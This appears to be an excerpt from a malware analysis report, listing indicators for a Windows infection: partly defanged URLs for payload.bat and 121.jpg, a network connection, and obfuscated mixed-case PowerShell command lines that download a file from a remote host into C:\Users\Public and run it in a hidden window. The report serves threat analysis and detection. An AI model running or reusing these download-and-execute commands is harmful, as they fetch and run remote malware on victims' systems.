Technical Information
- http://19#.#68.175.157/payload.bat
- http://19#.#68.175.157/121.jpg as c:\users\public\121.jpg
- '<LOCALNET>.175.157':80
- '%WINDIR%\syswow64\cmd.exe' /c PoWeRsHeLl -wIn 1 -C (nEw-ObJeCt NeT.WebClIeNt).dOwNlOaDfIlE('http://19#.#68.175.157/121.jpg', 'C:\Users\Public\121.jpg') & pOwErShElL -wIn 1 -c C:\Users\Public\121.jpg & pOwErShElL -wIn 1 -...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -wIn 1 -c C:\Users\Public\121.jpg